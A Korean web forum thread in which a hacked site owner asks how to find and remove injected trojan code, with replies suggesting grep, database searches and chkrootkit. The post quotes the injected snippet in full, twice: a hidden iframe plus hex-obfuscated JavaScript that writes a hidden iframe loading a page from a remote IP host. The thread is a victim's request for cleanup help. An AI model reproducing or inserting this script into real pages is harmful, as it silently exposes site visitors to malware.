해킹코드 트로이 코드 찾는방법 도와주세요
해킹 문제로 문의 드렸었는데요~~
도움주신분들 감사합니다~
복구도 안되고 코드를 찾아서 지우는 방법 뿐인데
도저히 찾기가 힘드네요
상단에 삽입되어 있어~~ 페이지 이동할때마다 감염 됩니다
아래 코드를 찾을수있도록 도와주세요
부탁 합니다
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47b0f5321487a(v47b0f53214c75){ function v47b0f53215070 () {var v47b0f5321546f=16; return v47b0f5321546f;} return(parseInt(v47b0f53214c75,v47b0f53215070()));}function v47b0f53215880(v47b0f53215c7a){ function v47b0f5321686e () {var v47b0f53216c6c=2; return v47b0f53216c6c;} var v47b0f53216076='';for(v47b0f53216472=0; v47b0f53216472<v47b0f53215c7a.length; v47b0f53216472+=v47b0f5321686e()){ v47b0f53216076+=(String.fromCharCode(v47b0f5321487a(v47b0f53215c7a.substr(v47b0f53216472, v47b0f5321686e()))));}return v47b0f53216076;} document.write(v47b0f53215880('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3338313462207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313037393132292B273536615C272077696474683D323837206865696768743D333736207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script><!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->
도움주신분들 감사합니다~
복구도 안되고 코드를 찾아서 지우는 방법 뿐인데
도저히 찾기가 힘드네요
상단에 삽입되어 있어~~ 페이지 이동할때마다 감염 됩니다
아래 코드를 찾을수있도록 도와주세요
부탁 합니다
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47b0f5321487a(v47b0f53214c75){ function v47b0f53215070 () {var v47b0f5321546f=16; return v47b0f5321546f;} return(parseInt(v47b0f53214c75,v47b0f53215070()));}function v47b0f53215880(v47b0f53215c7a){ function v47b0f5321686e () {var v47b0f53216c6c=2; return v47b0f53216c6c;} var v47b0f53216076='';for(v47b0f53216472=0; v47b0f53216472<v47b0f53215c7a.length; v47b0f53216472+=v47b0f5321686e()){ v47b0f53216076+=(String.fromCharCode(v47b0f5321487a(v47b0f53215c7a.substr(v47b0f53216472, v47b0f5321686e()))));}return v47b0f53216076;} document.write(v47b0f53215880('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3338313462207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313037393132292B273536615C272077696474683D323837206865696768743D333736207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script><!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->
|
댓글을 작성하시려면 로그인이 필요합니다.
로그인
댓글 7개
다시 찾으려고 하면 못찾는게 문제임! 시간나는대로 찾고있긴한데...
grep -r 'DOCTYPE' *
해서 파일을 찾아 보세요.
내용이 넘쳐서인지.. 전체가 다 안 보이고 넘어가버리네요.
그래서 앞부분을 확인을 못합니다.
보여질만큼만 정해서 한정하는 옵션은 없나요?
항상 행복하세요
1) file에 숨어 있다가 뿌려지는 경우 - 위 엑스엠엘 님 방식대로 해 보세요, 아니면 통채로 내 PC로 모든 파일을 다운받아서
사용하시는 text editor로 위를 검색하여 삭제하세요... 모든 계정의 같은 파일내에도 확인하여 삭제하세요
2) 혹시 DB에 숨어 있을수 있습니다. phpMyAdmin 을 이용하여 위를 iframe src 혹 구별이 가는 문자를 검색하여 보세요
또한 근본 원인을 알아보세요.. 이번에 삭제해도 또 올수 있으니까요.
1) apache
2) php
3) 해당웹프로그램
등 전부 체크하셔야 합니다.
chkrootkit라는 프로그램이 있어요..그놈 설치하고 돌리면 감염여부와 감염된 파일이 목록으로 출력됩니다.
새로나의 홈페이지는 웹호스팅을 받고 있는 거라서...
별도로 설치하려면 해당 호스팅 업체에 의뢰해야하는건가요?